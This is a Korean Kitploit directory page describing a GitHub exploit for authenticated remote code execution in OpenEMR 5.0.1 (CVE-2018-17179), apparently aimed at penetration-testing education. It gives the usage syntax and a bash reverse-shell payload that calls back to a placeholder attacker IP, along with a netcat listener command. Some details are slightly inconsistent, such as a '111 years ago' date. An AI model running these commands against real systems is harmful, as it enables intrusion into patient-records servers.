Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-17179-OpenEMR — OpenEMR 5.0.1을 위한 인증된 원격 코드 실행 익스플로잇 (CVE-2018-17179)으로, 사용자 정의 명령 페이로드 및 리버스 셸을 지원하며 교육용 침투 테스트를 목적으로 합니다. | Kitploit
도구/GitHubGitHub/cyberquestor-infosec/cve-2018-17179-openemr
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubcyberquestor-infosec/cve-2018-17179-openemr

CVE-2018-17179-OpenEMR

OpenEMR 5.0.1을 위한 인증된 원격 코드 실행 익스플로잇 (CVE-2018-17179)으로, 사용자 정의 명령 페이로드 및 리버스 셸을 지원하며 교육용 침투 테스트를 목적으로 합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
111년 전아직 검토되지 않음

CVE-2018-17179-OpenEMR

⚠️ 면책 조항
이 저장소는 교육 및 연구 목적으로만 제공됩니다.
여기 제공된 정보와 코드는 통제된 환경(예: 개인 실험실 머신)에서만 사용할 수 있습니다.

소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에 대해 이 코드를 무단으로 사용하는 것은 불법적이고 비윤리적입니다.
저자는 이로 인한 어떠한 오용이나 손해에 대해서도 책임지지 않습니다.


🔍 취약점 정보

CVE-2018-17179는 널리 사용되는 오픈 소스 전자 의무 기록 및 진료 관리 소프트웨어인 OpenEMR에 영향을 미칩니다.
rest_routes.php 엔드포인트의 인증 메커니즘에 있는 결함으로 인해 인증된 사용자가 서버에서 임의의 명령을 실행할 수 있습니다.

이로 인해 웹 서버 사용자 컨텍스트에서 **원격 코드 실행(RCE)**이 발생할 수 있습니다.

  • 취약점 유형: 인증된 원격 코드 실행
  • 영향받는 구성 요소: interface/main/main_screen.php (rest_routes.php 경유)
  • 인증 필요: ✅ 예
  • 심각도: 심각
  • CVSS Score: 9.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

🧾 참고 자료

  • Exploit-DB 항목 – 45161
  • OpenEMR GitHub 저장소
  • CVE 세부정보 – CVE-2018-17179
  • NVD CVE 보고서

🛠 익스플로잇 개요

이 저장소는 Exploit-DB의 공개 익스플로잇의 수정된 버전을 제공합니다.

  • 익스플로잇 제목: OpenEMR 5.0.1 – 인증된 RCE
  • ExploitDB ID: 45161
  • 언어: Python 2
  • 인증 필요: 예

이 맞춤형 익스플로잇에서:

  • 명령 페이로드를 직접 지정할 수 있습니다(예: 리버스 셸).
  • 이 익스플로잇은 유연성을 위해 깔끔한 CLI 실행을 허용합니다.
  • 세션 쿠키 생성 및 명령 주입 로직과 같은 민감한 필드는 원본에서 유지되었습니다.

💥 시연

🔐 로그인 페이지

로컬 테스트 OpenEMR 로그인 패널 대상:

로그인 페이지


📂 익스플로잇 사용법

Usage: python2 exploit.py <target_url> -u <username> -p <password> -c <command>

Example:
python2 exploit.py http://<target>/openemr -u admin -p secretpass -c 'id'
  • Python 2가 설치되어 있어야 합니다.
  • 사용자는 취약한 rest_routes.php 엔드포인트에 접근할 수 있어야 합니다.


익스플로잇 실행

수정된 익스플로잇 스크립트를 bash 리버스 셸 페이로드와 함께 실행했습니다:

```bash
python2 exploit.py http://<target>/openemr -u <username> -p <password> -c 'bash -i >& /dev/tcp/<your-ip>/4444 0>&1'

익스플로잇 출력

3단계 – 리버스 셸 연결 성공

포트 4444의 Netcat 리스너가 리버스 셸을 성공적으로 수신했습니다:

nc -nvlp 4444

익스플로잇 출력

📖 Medium 블로그

자세한 설명과 이론은 제 Medium 게시글을 확인하세요:
👉 Medium에서 블로그 읽기

도구 다운로드